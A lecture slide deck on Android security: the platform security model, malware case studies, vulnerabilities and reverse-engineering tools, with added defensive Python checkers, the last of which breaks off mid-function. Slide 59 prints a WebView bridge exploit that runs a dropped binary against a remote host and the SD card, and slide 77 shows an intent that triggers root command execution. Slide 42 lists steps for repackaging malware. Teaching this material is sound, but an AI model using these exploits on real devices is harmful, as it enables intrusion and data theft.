Slide 1

Android Security
Bob Mingshen Sun
[email protected]
November 2, 2015

Slide 2

[1] http://blog.applause.com/android-or-ios-a-multi-stat-head-to-head-battle/2013/04/

Slide 3

Introduction — Android Market Share
"Android climbed to 79 percent of smartphone market share in 2013." — Engadget
"Android dominates 81 percent of world smartphone market." — CNET [2]
[2] CNET
Bob (CUHK) Android Security November 2, 2015 3 / 107

Slide 4

Introduction — Android Malware
"Terrifying new smartphone malware tracks your swipes to steal your PIN." — BGR
"New Windows malware tries to infect Android devices connected to PCs." — PCWorld
"First Android bootkit malware spotted; reportedly found on over 350,000 mobile devices, most in China." — TNW

Slide 5

Introduction — Oldboot
Oldboot has infected more than 500,000 devices in China. Chinese retailers flashed this bootkit into the boot partition of Android phones they sold. Since the boot partition in Android is loaded as a read-only RAM disk, existing antivirus solutions cannot effectively clean it from infected devices. Oldboot tries to connect to its C&C servers, downloads adware and installs it as system applications. It can also execute arbitrary remote commands with root permission.

Slide 6

Outline I
1 Introduction
2 Background
  How to Build an Android Application?
  Application Fundamentals
  APK File Structure
  Android Architecture
  Android Platform Security Architecture
  Distribution Methods of Apps
3 Attacks
  Android Malware
  Malware Distribution
  Vulnerabilities of Android OS
  Android Apps Security
4 Analysis Tools

Slide 7

Outline II
  Tools in Android SDK
  Static Analysis
  Dynamic Analysis
  Online Analysis
5 Defense
  Obfuscation
  Android NDK
  Security Tips
6 Conclusion

Slide 8

Outline
1 Introduction
2 Background
  How to Build an Android Application?
  Application Fundamentals
  APK File Structure
  Android Architecture
  Android Platform Security Architecture
  Distribution Methods of Apps
3 Attacks
4 Analysis Tools
5 Defense

Slide 9

How to Build an Android Application? [3]
[3] http://developer.android.com/tools/building/index.html

Slide 10

How to Build an Android Application? — Android Project
Android Project
|-- AndroidManifest.xml
|-- src/
|   `-- package_name/
|       `-- MainActivity.java
`-- res/
    |-- drawable-hdpi/
    |   `-- ic_launcher.png
    |-- layout/
    |   `-- activity_main.xml
    `-- values/

- AndroidManifest.xml: describes the fundamental characteristics of the app and defines each of its components.
  - SDK version
  - permission usage
- src/: main source files in Java.
- res/:
  - drawable: pictures
  - application layout in XML
  - string and color definitions in XML

Slide 11

How to Build an Android Application? — Hello World
IDE: Eclipse with ADT plugin, Android Studio, Android SDK

    import android.app.Activity;
    import android.os.Bundle;
    import android.widget.TextView;

    public class MainActivity extends Activity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            // inflate res/layout/activity_main.xml
            setContentView(R.layout.activity_main);
            TextView tvHelloWorld = (TextView) findViewById(R.id.tv_hello_world);
            tvHelloWorld.setText("Hello World");
        }
    }

Slide 12

How to Build an Android Application? — Hello World
Layout: activity_main.xml

Slide 13

How to Build an Android Application? — Hello World
AndroidManifest.xml

Slide 14

How to Build an Android Application? — Details
A detailed look at the build process
1 The Android Asset Packaging Tool (aapt) takes the resource files and compiles them.
2 The aidl tool converts .aidl interfaces.
3 The Java compiler compiles all Java code into .class files.
4 The dex tool converts the .class files into Dalvik bytecode.
5 All non-compiled and compiled resources are packaged into an .apk file.

Slide 15

How to Build an Android Application? — Details [4]
A detailed look at the build process (cont.)
6 Sign the package with a key before installation.
7 Align the file with zipalign to decrease memory usage.
[4] http://developer.android.com/tools/building/index.html

Slide 16

Application Fundamentals
App components:
- Activities: an activity represents a single screen with a user interface.
- Services: a service is a component that runs in the background to perform long-running operations or to perform work for remote processes.
- Content providers: a content provider manages a shared set of app data.
- Broadcast receivers: a broadcast receiver is a component that responds to system-wide broadcast announcements.
Activating components: Intents.

Slide 17

Application Fundamentals — Activity Lifecycle
Activity states [7]

Slide 18

Application Fundamentals — Activity Lifecycle
Activity lifecycle methods [7]

Slide 19

Application Fundamentals
The manifest file:
- declaring components ...
- declaring component capabilities
- declaring app requirements

Slide 20

APK File Structure
APK files are a type of archive file, specifically zip-format packages based on the JAR file format.

$ file facebook.apk
facebook.apk: Zip archive data, at least v2.0 to extract
$ unzip facebook.apk
$ tree facebook
facebook/
|-- AndroidManifest.xml
|-- classes.dex
|-- resources.arsc
|-- lib/
|-- asset/
|-- res/
`-- META-INF/
    |-- MANIFEST.MF
    |-- CERT.RSA
    `-- CERT.SF

Slide 21

APK File Structure — Details
- AndroidManifest.xml: the compiled AndroidManifest.xml (Android binary XML), which is not human-readable.
- classes.dex: the classes compiled in the dex file format understood by the Dalvik virtual machine.
- META-INF: certificate and SHA-1 digest information.
- lib: native libraries for different platforms (armeabi, x86, mips).

Slide 22

Android Architecture

Slide 23

Android Architecture
- Linux Kernel: drivers for hardware, networking, file system access and inter-process communication.
- Libraries: native libraries, daemons and services (written in C or C++).
- Android Runtime: the Dalvik Virtual Machine and the supported core libraries.
- Application Framework: framework services and libraries (written mostly in Java); most framework code executes in a Dalvik virtual machine.
- Applications: pre-installed applications and applications from marketplaces, written in Java and executing in the Dalvik VM.

Slide 24

Android Architecture — Dalvik Virtual Machine
- The Dalvik VM is a register-based Java virtual machine.
- Optimized to use less space.
- Runs Dalvik bytecode (.dex files) rather than Java bytecode (.class files).
More... [6]

Slide 25

Android Platform Security Architecture
To protect user data, protect system resources (including the network) and provide application isolation, Android provides these key security features:
- Robust security at the OS level through the Linux kernel
- Mandatory application sandbox for all applications
- Secure interprocess communication
- Application signing
- Application-defined and user-granted permissions

Slide 26

Android Platform Security Architecture — Sandbox
- A multi-user Linux system in which each app is a different user.
- The system assigns each app a unique Linux user ID.
- Only the user ID assigned to that app can access its resources.
- Each process has its own VM.
- Every app runs in its own Linux process. [10]

Slide 27

Android Platform Security Architecture — Inter-process Communication
ICC: Inter-component communication
IPC: Inter-process communication
Why IPC?
- Each process runs in its own memory address space.
- Provides data isolation.
- Prevents harmful interaction.

Slide 28

Android Platform Security Architecture — Inter-component Communication
ICC describes the mechanism by which the different types of Android components communicate with each other.
Component view of ICC: Intents between Activity, Service, Content Provider and Broadcast Receiver [5]

Slide 29

Android Platform Security Architecture — Inter-process Communication
- GNU/Linux: signals, pipes, sockets, semaphores, messages, shared memory.
- Android: Binder — a lightweight RPC (Remote Procedure Call) mechanism.

Slide 30

Android Platform Security Architecture — Inter-process Communication
- ServiceManager: manages registered services (register/delete/query).
- Service provider: registers with the ServiceManager.
- Service user: requests a service from the ServiceManager and executes remote services.

Slide 31

Android Platform Security Architecture — Fine-grained Permission Mechanism
Accessing protected APIs:
- Camera functions
- Location data (GPS)
- Bluetooth functions
- Telephony functions
- SMS/MMS functions
- Network/data connections
Permissions are declared explicitly in AndroidManifest.xml.

Slide 32

Android Platform Security Architecture — Application Signing
The Android system requires that all installed applications be digitally signed with a certificate whose private key is held by the application's developer.
- All applications must be signed.
- A special debug key is used for testing and debugging.
- Sign with your private key when publishing.
- Self-signed certificates; no certificate authority is needed.
- Expiration date.
- Keytool & Jarsigner
- zipalign

Slide 33

Android Platform Security Architecture — Application Signing
Motivations for APK signing:
- Update apps.
- Ensure the application is unmodified.
- Share data between applications from the same developer.
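The "application is unmodified" guarantee rests on the JAR-style manifest inside META-INF (slides 20 and 21): MANIFEST.MF carries a SHA1-Digest for every entry, and CERT.SF/CERT.RSA sign that manifest. The following Python is an added example, not code from the slides or from the Android SDK: it builds a constructed APK-like zip in memory, verifies each entry against its manifest digest, and shows that replacing classes.dex without re-signing is detected. It checks only the per-entry digests; verifying the CERT.SF/CERT.RSA signature over the manifest is out of scope here.

```python
import base64
import hashlib
import io
import zipfile

# Constructed sample entries (not a real app); they mimic the layout shown on
# the APK File Structure slide.
SAMPLE_ENTRIES = {
    "AndroidManifest.xml": b"<constructed binary manifest>",
    "classes.dex": b"dex\n035\x00constructed dex payload",
    "resources.arsc": b"constructed resources",
}


def sha1_b64(data):
    """JAR manifests store digests as base64 of the raw SHA-1 hash."""
    return base64.b64encode(hashlib.sha1(data).digest()).decode()


def build_sample_apk(entries):
    """Build an APK-like zip in memory with a MANIFEST.MF listing every entry's digest.
    CERT.SF and CERT.RSA are omitted: this example checks only the per-file digests."""
    manifest = ["Manifest-Version: 1.0", "Created-By: constructed-example", ""]
    for name, data in entries.items():
        manifest += [f"Name: {name}", f"SHA1-Digest: {sha1_b64(data)}", ""]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
        z.writestr("META-INF/MANIFEST.MF", "\r\n".join(manifest))
    return buf.getvalue()


def parse_manifest(text):
    """Return {entry name: SHA1-Digest}. Sections are blank-line separated and
    continuation lines start with a single space (the JAR format wraps at 72 bytes)."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    digests, name = {}, None
    for line in lines:
        if not line.strip():
            name = None
        elif line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA1-Digest: ") and name:
            digests[name] = line[len("SHA1-Digest: "):]
    return digests


def verify_apk_digests(apk_bytes):
    """Return (ok, problems). Every digest in MANIFEST.MF must match the entry it
    names, and every non-META-INF entry must be covered by a digest."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
        digests = parse_manifest(z.read("META-INF/MANIFEST.MF").decode())
        for name, expected in digests.items():
            if name not in names:
                problems.append(f"missing entry {name}")
            elif sha1_b64(z.read(name)) != expected:
                problems.append(f"digest mismatch for {name}")
        for name in sorted(names - set(digests)):
            if not name.startswith("META-INF/"):
                problems.append(f"unsigned entry {name}")
    return (not problems, problems)


def replace_entry(apk_bytes, name, new_data):
    """Rewrite one entry without touching MANIFEST.MF, to test that the check catches it."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = new_data if info.filename == name else src.read(info.filename)
            dst.writestr(info.filename, data)
    return out.getvalue()


if __name__ == "__main__":
    apk = build_sample_apk(SAMPLE_ENTRIES)
    print("original:", verify_apk_digests(apk))
    modified = replace_entry(apk, "classes.dex", b"dex\n035\x00modified")
    print("modified:", verify_apk_digests(modified))
```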

Slide 34

Distribution Methods of Apps
- Google Play (official market): more secure, but still has malware.
- Third-party markets/forums: popular in China; fewer restrictions; a lot of malware.

Slide 35

Outline
1 Introduction
2 Background
3 Attacks
  Android Malware
  Malware Distribution
  Vulnerabilities of Android OS
  Android Apps Security
4 Analysis Tools
5 Defense

Slide 36

Subsection 1: Android Malware

Slide 37

Android Malware — Introduction
There is a massive growth in the volume of malware families and samples. — Symantec [12]

Slide 38

Android Malware — Introduction
Top ten app categories with the highest percentage of malware. On third-party app stores, the most dangerous is the Games/Arcade & Action category, followed by the Photography category. [12]

Slide 39

Android Malware — Introduction
Third-party app stores hosting the most malware from January to June 2013. Although malware slips into Google Play, most malware is hosted on third-party app stores. There are also stores that only host malware. [12]

Slide 40

Android Malware — Characterization
Characterized by:
- Malware installation
- Activation
- Malicious payloads

Slide 41

Android Malware — Characterization
Malware installation:
- Repackaging
- Update attacks
- Drive-by download
- Others

Slide 42

Android Malware — Characterization: Repackaged Malware
Characteristics of repackaged malware:
- One of the most common techniques.
- Malware piggybacks malicious payloads into popular applications.
Steps:
- Download apps.
- Disassemble the APK file (smali/baksmali, apktool, IDA Pro, ...).
- Enclose malicious payloads.
- Re-assemble and submit to official or alternative Android markets.

Slide 43

Android Malware — Characterization: Repackaged Malware
Case study — Flappy Bird [14]
- Massively popular small game on smartphones.
- Exactly the same appearance as the original version.
- Fake Android Flappy Bird: Premium Service Abusers, i.e. apps that send messages to premium numbers, causing unwanted charges on victims' phone bills.
- Especially rampant in app markets in Russia and Vietnam.

Slide 44

Android Malware — Characterization: Repackaged Malware
Case study — Flappy Bird [14]
- Read/send text message permission, which is not required in the original version.
- Sends messages to premium numbers (8777 & 8738).
- Connects to a C&C server to receive instructions.
- Information leakage.
Other repackaged game malware: Candy Crush, Angry Birds Space, Temple Run 2.

Slide 45

Android Malware — Characterization: Update Attack
- Repackage popular apps, but do not enclose the payload as a whole.
- Piggyback an update component that will fetch or download the malicious payloads at runtime.
Static scanning?

Slide 46

Android Malware — Characterization: Update Attack
Case study — BaseBridge
- An update dialogue says that a new version is available.
- The malicious payload is then installed. [15]

Slide 47

Android Malware — Characterization: Drive-by Download
- Entice users to download "interesting" or "feature-rich" apps.
- GGTracker: in-app advertisement.
- Jifake: QR code.
Others:
- Spyware
- Fake apps
- Intentionally malicious apps
- Rely on the root privilege

Slide 48

Android Malware — Characterization
Characterized by activation:
- BOOT_COMPLETED
- SMS_RECEIVED
- ACTION_MAIN
- combinations of events

Slide 49

Android Malware — Characterization
Characterized by malicious payloads:
- Privilege escalation
- Remote control: C&C server, botnet
- Financial charge: subscribing to premium-rate services
- Information collection: SMS messages, phone numbers, email addresses, installed package list?

Slide 50

Android Malware — Evolution
From naive repackaging to sophisticated obfuscation: DroidKungFu
- root exploits
- C&C servers
- shadow payloads: APK package obfuscation, JNI

Slide 51

Android Malware — Evolution
Bleeding-edge malware
- AVPasser: anti-detection. Report: http://contagiominidump.blogspot.hk/2014/01/android-oldboot-mouabads.html
- Oldboot: bootkit on Android. "modify devices' boot partition and booting script file to launch system service and extract malicious application during the early stage of system's booting" "Due to the special RAM disk feature of Android devices' boot partition, all current mobile antivirus product in the world can't completely remove this Trojan or effectively repair the system." http://blogs.360.cn/360mobile/2014/01/17/oldboot-the-first-bootkit-on-android/

Slide 52

Android Malware — Distribution [8]

Slide 53

Subsection 3: Vulnerabilities of Android OS

Slide 54

Permission Abuses
Android permission mechanism:
- Permissions are requested before installation.
- Once accepted, the system never asks you again.
- The user has no idea when/where/how these permissions are used.
Permission abuses: 37 permissions for a map application.

Slide 55

Capability Leaks
Permission re-delegation:
- Malware does not have the permission to send text messages.
- A legitimate application has the permission.
- The legitimate application accidentally exposes its component to others without verification.
- Malware uses the permission of the deputy (the legitimate application) to complete its malicious behaviour. [4]

Slide 56

Collusion Attack
- Malicious applications collude to combine their permissions.
- They perform actions beyond their individual privileges.

Slide 57

WebView Vulnerabilities
What is WebView?
- An embedded browser inside an app.
- Web applications for cross-platform use: HTML5 and JavaScript.
How can apps interact with the web content?
Apps -> Web pages:
- Apps can inject JavaScript code into web pages (e.g., load a JavaScript file into the page).
- Apps can monitor and intercept the events that occur within web pages (e.g., the onPageFinished event).
Web pages -> Apps:
- Apps can register interfaces with the WebView (e.g., a file operations interface).
- JavaScript code can invoke these interfaces (e.g., JavaScript can read/write internal files).

Slide 58

WebView Vulnerabilities — Threat Models [9]

Slide 59

WebView Vulnerabilities — Case Study
Abusing WebView JavaScript Bridges

    function execute(cmdArgs) {
        return SmokeyBear.getClass()
            .forName("java.lang.Runtime")
            .getMethod("getRuntime", null)
            .invoke(null, null)
            .exec(cmdArgs);
    }
    execute(["/system/bin/sh", "-c", "echo '" + armBinary + "' > /data/data/com.example.webviewhack/armB2"]);
    execute(["chmod", "755", "/data/data/com.example.webviewhack/armB2"]);
    var p = execute(["/data/data/com.example.webviewhack/armB2", "192.168.1.116", "/mnt/sdcard"]);
    document.write(getContents(p.getInputStream()));

Slide 60

Root Exploits
What is rooting?
- Linux root user
- Get around any restrictions
Why would you root?
- Access the entire file system
- Install special apps
- Flash custom ROMs
Why wouldn't you root?
- Void your warranty
- Brick your phone
- Security risk: you may accidentally disclose root privilege to malware

Slide 61

Root Exploits
How to gain root in Android?
- Linux kernel exploits: CVE-2012-0056, CVE-2009-2692 (http://www.cvedetails.com/)
- Android exploits: GingerBreak, zergRush
- Third-party firmware with root privilege

Slide 62

Android Apps Security [5]
- data storing
- data transportation
- password and authentication
- component capability leaks
- others
[5] Claud Xiao. "Android Apps Security in Practice". In: xKungfu. 2013.

Slide 63

Android Apps Security — Data Storing
Data storing:
- External storage (SD card): no permission management; any app can read/write anything on external storage.
- Internal storage (SQLite, XML, files): protected by user ID; root is needed to access it.

Slide 64

Android Apps Security — Data Storing
Attack surface: storing private data on the SD card.
- Example: backup data, IM messages, SNS data
- Problem: can be accessed by others
- Consequence: privacy leakage
- Solution: encryption

Slide 65

Android Apps Security — Data Storing
Attack surface: storing dynamic payloads on the SD card.
- Example: storing downloaded APK, DEX and JAR files on the SD card and loading/installing them at runtime
- Problem: can be manipulated by others
- Consequence: phishing, malware, privacy leakage
- Solution: check authority and integrity before installation

Slide 66

Android Apps Security — Data Storing
Attack surface: storing configurations on the SD card.
- Example: storing configuration data in plain text
- Problem: can be manipulated by others
- Consequence: phishing, malware, privacy leakage, MITM attack, SQL injection
- Solution: internal storage, encryption, checking authority and integrity before use

Slide 67

Android Apps Security — Data Storing
Attack surface: world-readable/writeable internal files.
- Example: sharing data between apps using Context.MODE_WORLD_READABLE or Context.MODE_WORLD_WRITEABLE
- Problem: can be manipulated by others
- Consequence: privacy leakage
- Solution: use a Content Provider; do not make internal data world-readable or world-writeable

Slide 68

Android Apps Security — Data Storing
Attack surface: storing private data in internal storage.
- Example: passwords, credit card numbers in plain text
- Problem: accessible with root
- Consequence: privacy leakage
- Solution: do not store this information; encryption; other authentication methods

Slide 69

Android Apps Security — Data Transportation
Attack surface: plain-text transportation.
- Example: passwords, session keys and private data transported in plain text
- Problem: open WiFi, sniffing
- Consequence: privacy leakage
- Solution: TLS/SSL

Slide 70

Example

    POST /api/checkaccount HTTP/1.1
    User-Agent: MomoChat/1.11build Android/12 (LT18i; Android 2.3.4; zh_CN)
    Content-Length: 249
    Content-Type: application/x-www-form-urlencoded
    Host: www.immomo.com:80
    Connection: Keep-Alive

    uid=85dab7d268769df46abe111a82976931&phone_netWork=2&screen=480x854&model=LT18i&rom=2.3.4&phone_type=GSM&device_type=android&account=xxxxxx&mac=5c%3Ab5%3A24%3A09%3Ae1%3A58&market_source=1&buildnumber=4.0.2.A.0.58%2Fxf_v3w&password=xxxxxx&version=12
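A capture like the one above can be checked mechanically during a review. The Python below is an added example, not code from the slides: it parses a constructed request modeled on that capture (all values made up) and reports the credential and device-identifier form fields that travel in the clear. Whether the connection used TLS has to be supplied from the capture itself, since the request text alone cannot tell.

```python
from urllib.parse import parse_qs

# Field names that should never travel in the clear, grouped by what the slide
# calls out: credentials and session material, and device/account identifiers.
CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "session", "sessionid", "token"}
IDENTIFIER_FIELDS = {"mac", "imei", "imsi", "uid", "account"}

# Constructed request modeled on the capture above (host and values are made up).
SAMPLE_REQUEST = (
    "POST /api/checkaccount HTTP/1.1\r\n"
    "User-Agent: ExampleChat/1.0 Android/12 (LT18i; Android 2.3.4; zh_CN)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.example.com:80\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    "uid=0123456789abcdef&phone_netWork=2&screen=480x854&model=LT18i"
    "&account=alice&mac=00%3A11%3A22%3A33%3A44%3A55&password=hunter2&version=12"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers, body


def audit_request(raw, over_tls=False):
    """Return [(path, field, finding)] for sensitive form fields sent without TLS.
    over_tls comes from the capture (port/stream), since the request text cannot tell."""
    if over_tls:
        return []
    _method, path, headers, body = parse_http_request(raw)
    ctype = headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return [(path, "", "non-form body not inspected")]
    findings = []
    # parse_qs keeps the body's field order, so findings follow the wire order
    for field in parse_qs(body, keep_blank_values=True):
        key = field.lower()
        if key in CREDENTIAL_FIELDS:
            findings.append((path, field, "credential sent in plaintext"))
        elif key in IDENTIFIER_FIELDS:
            findings.append((path, field, "device/account identifier sent in plaintext"))
    return findings


if __name__ == "__main__":
    for path, field, finding in audit_request(SAMPLE_REQUEST):
        print(f"{path}: {field}: {finding}")
```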

Slide 71

Android Apps Security — Data Transportation
Attack surface: SSL certificates.
- Example: trusting all certificates
- Problem: MITM attack
- Consequence: privacy leakage
- Solution: CA, keystore

Slide 72

Android Apps Security — Data Transportation
Attack surface: SMS messages.
- Example: using SMS messages for registration and passwords
- Problem: send, read, hijack
- Consequence: privacy leakage
- Solution: HTTPS

Slide 73

Android Apps Security — Password
Attack surface:
- weak passwords, short passwords, base64, XOR
- session key: hash(account+password)
- IMEI, IMSI

Slide 74

Android Apps Security — Capability Leaks
Attack surface: Intent
- call B => execution
- call B with parameters => results
- call B => results
- fake B => access A's data
- fake B => triggered by A, phishing

Slide 75

Example

Slide 76

Example

    if ("284".equals(paramIntent.getData().getHost())) {
        asyncExecute(new Runnable() {
            public void run() {
                try {
                    String str = CitBroadcastReceiver.TAG;
                    String[] arrayOfString = new String[3];
                    arrayOfString[0] = "bugreport";
                    arrayOfString[1] = ">";
                    arrayOfString[2] = m_logFileName;
                    CitUtils.rootExecProgram(str, arrayOfString, true);
                } catch (Exception e) {
                    // catch block elided in the original excerpt
                }
            }
        });
    }

Slide 77

Example
Attack:

    Intent intent = new Intent();
    intent.setAction("android.provider.Telephony.SECRET_CODE");
    intent.setData(Uri.parse("android_secret_code://284"));
    sendBroadcast(intent);

- executes bugreport with root privilege
- dumps system info onto the SD card

Slide 78

Android Apps Security — Capability Leaks
Attack surface: Intent
Solution: signature permission checking
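The receiver in the preceding example is reachable by any app because it declares an intent-filter (so it is exported) and no android:permission. The Python below is an added example, not code from the slides or from the Android SDK: it reads a decoded AndroidManifest.xml, applies the platform's export defaults, and flags exported components that are unprotected or guarded only by a permission whose protectionLevel is not signature. The manifest is constructed; component names such as .CitBroadcastReceiver are placeholders echoing the slide, and the targetSdkVersion (which decides the provider default) is an assumed parameter.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest (not from any real app). The receiver mirrors the
# pattern in the preceding example: it answers a broadcast action, is therefore
# implicitly exported, and declares no permission.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sample">
  <permission android:name="com.example.sample.CONTROL" android:protectionLevel="signature"/>
  <permission android:name="com.example.sample.WEAK" android:protectionLevel="normal"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".CitBroadcastReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SECRET_CODE"/>
      </intent-filter>
    </receiver>
    <service android:name=".ControlService" android:exported="true"
        android:permission="com.example.sample.CONTROL"/>
    <service android:name=".SyncService" android:exported="true"
        android:permission="com.example.sample.WEAK"/>
    <provider android:name=".DataProvider" android:authorities="com.example.sample.data"
        android:exported="false"/>
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an attribute from the android: namespace."""
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_launcher(elem):
    """The launcher activity has to be exported, so it is not reported."""
    return any(
        attr(c, "name") == "android.intent.category.LAUNCHER"
        for f in elem.findall("intent-filter")
        for c in f.findall("category")
    )


def is_exported(elem, target_sdk):
    """Platform default: an explicit android:exported wins; otherwise activities,
    services and receivers are exported iff they declare an intent-filter, and
    providers are exported by default only when targetSdkVersion < 17."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit == "true"
    if elem.tag == "provider":
        return target_sdk < 17
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text, target_sdk=16):
    """Return [(component, finding)] for exported components that any app can reach:
    no android:permission at all, or a permission whose protectionLevel is not signature."""
    root = ET.fromstring(xml_text)
    levels = {attr(p, "name"): attr(p, "protectionLevel") or "normal"
              for p in root.iter("permission")}
    findings = []
    for elem in root.find("application"):
        if elem.tag not in COMPONENT_TAGS or is_launcher(elem):
            continue
        if not is_exported(elem, target_sdk):
            continue
        name, perm = attr(elem, "name"), attr(elem, "permission")
        if perm is None:
            findings.append((name, "exported without android:permission"))
        elif levels.get(perm, "undeclared") != "signature":
            level = levels.get(perm, "undeclared")
            findings.append((name, f"exported behind {perm} (protectionLevel {level})"))
    return findings


if __name__ == "__main__":
    for component, finding in audit_manifest(SAMPLE_MANIFEST):
        print(component, "->", finding)
```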

Slide 79

Android Apps Security — Others
Attack surface:
- Logcat
- Open WiFi
- WebView

Slide 80

Outline
1 Introduction
2 Background
3 Attacks
4 Analysis Tools
  Tools in Android SDK
  Static Analysis
  Dynamic Analysis
  Online Analysis
5 Defense

Slide 81

Tools in Android SDK
adb: Android Debug Bridge (adb) is a versatile command line tool that lets you communicate with an emulator instance or connected Android-powered device.

    $ adb install ...apk
    $ adb shell
    $ adb pull
    $ adb push

logcat: The Android logging system provides a mechanism for collecting and viewing system debug output.

    $ adb logcat
    log information ...

Others:
- aapt: Android Asset Packaging Tool
- keytool & jarsigner: sign your application
- zipalign: align the final package

Slide 82

Static Analysis — Fundamentals
Recall:
- .java -> .class -> classes.dex
- classes.dex is zipped into the APK file together with the other resources
- the dex file is the bytecode file for the Dalvik VM
Reverse engineering?
- .dex format
- bytecode format
- instruction formats
Specifications: https://source.android.com/devices/tech/dalvik/dalvik-bytecode.html

Slide 83

Static Analysis — smali/baksmali
smali/baksmali: https://code.google.com/p/smali/
smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android's Java VM implementation.

Slide 84

Static Analysis — smali/baksmali
HelloWorld application

    $ unzip HelloWorld.apk -d hello_world
    Archive: HelloWorld.apk
      inflating: hello_world/res/layout/activity_main.xml
      inflating: hello_world/classes.dex
      ...
    $ java -jar baksmali.jar hello_world/classes.dex
    $ tree com
    com
    `-- example
        `-- helloworld
            |-- BuildConfig.smali
            |-- MainActivity.smali
            |-- R$attr.smali
            |-- R$dimen.smali
            |-- R$drawable.smali
            |-- R$id.smali
            |-- R$layout.smali
            |-- R$menu.smali
            |-- R.smali
            |-- R$string.smali
            `-- R$style.smali

Slide 85

Static Analysis — android-apktool
apktool is based on smali/baksmali. https://code.google.com/p/android-apktool/
It is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step by step. It also makes working with an app easier because of the project-like file structure and the automation of some repetitive tasks like building the apk, etc.

Usage of apktool:

    apktool d[ecode] [OPTS] <file.apk> [<dir>]
    apktool b[uild] [OPTS] [<app_path>] [<out_file>]

Slide 86

Static Analysis — apktool
HelloWorld application

    $ apktool d HelloWorld.apk
    $ cat MainActivity.smali
    .class public Lcom/example/helloworld/MainActivity;
    .super Landroid/app/Activity;
    .source "MainActivity.java"
    ...
    .method protected onCreate(Landroid/os/Bundle;)V
        ...
        const-string v1, "Hello World"
        invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang ...

Change "Hello World" to "Hey Android".

Slide 87

Static Analysis — apktool
HelloWorld application

    $ apktool b HelloWorld
    $ file HelloWorld/dist/HelloWorld.apk
    HelloWorld/dist/HelloWorld.apk: Zip archive data, at least v2.0 to extract
    $ jarsigner ...
    $ zipalign ...
    $ adb install HelloWorld.apk
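Once the classes are disassembled as above, the same smali text can be scanned for the API calls that the Attacks section associates with malware (premium SMS, runtime code loading, shell execution), together with the string constants in the calling method, which is where a premium number or download URL tends to sit. This Python is an added example, not part of the slides or of smali/apktool; the smali input is constructed, with the number 8777 taken from the Flappy Bird case study.

```python
import re

# Dalvik API targets to look for (descriptor prefixes as they appear in smali
# invoke-* lines), chosen from the behaviours the Attacks slides describe.
SENSITIVE_APIS = {
    "Landroid/telephony/SmsManager;->sendTextMessage": "sends SMS (premium-service abuse)",
    "Ldalvik/system/DexClassLoader;-><init>": "loads code at runtime (update attack)",
    "Ljava/lang/Runtime;->exec": "executes a native command",
}

CLASS_RE = re.compile(r"^\.class\s+(?:\S+\s+)*(L[^;]+;)")
METHOD_RE = re.compile(r"^\.method\s+(.*?)\s*$")
STRING_RE = re.compile(r'^const-string(?:/jumbo)?\s+\w+,\s*"(.*)"')
INVOKE_RE = re.compile(r"^invoke-\S+\s+\{[^}]*\},\s*(L\S+?->\S+)")

# Constructed smali (not a real app): one harmless method and one that sends
# an SMS to the premium number from the Flappy Bird slide.
SAMPLE_SMALI = """\
.class public Lcom/example/game/Billing;
.super Ljava/lang/Object;
.source "Billing.java"

.method public greet()V
    .locals 2
    const-string v1, "Hello World"
    invoke-virtual {v0, v1}, Landroid/widget/TextView;->setText(Ljava/lang/CharSequence;)V
    return-void
.end method

.method public sendPremium()V
    .locals 6
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0
    const-string v1, "8777"
    const/4 v2, 0x0
    const-string v3, "GET INFO"
    const/4 v4, 0x0
    const/4 v5, 0x0
    invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method
"""


def parse_smali(text):
    """Split one smali file into {"<class>-><method sig>": {"strings": [...], "calls": [...]}}."""
    methods, current, class_name = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if class_name is None and (m := CLASS_RE.match(line)):
            class_name = m.group(1)
        if m := METHOD_RE.match(line):
            # the last token of the .method line is the name plus descriptor
            current = f"{class_name}->{m.group(1).split()[-1]}"
            methods[current] = {"strings": [], "calls": []}
        elif line == ".end method":
            current = None
        elif current and (m := STRING_RE.match(line)):
            methods[current]["strings"].append(m.group(1))
        elif current and (m := INVOKE_RE.match(line)):
            methods[current]["calls"].append(m.group(1))
    return methods


def find_sensitive_calls(text):
    """Return [(method, api, reason, strings_in_method)] for each sensitive invoke."""
    hits = []
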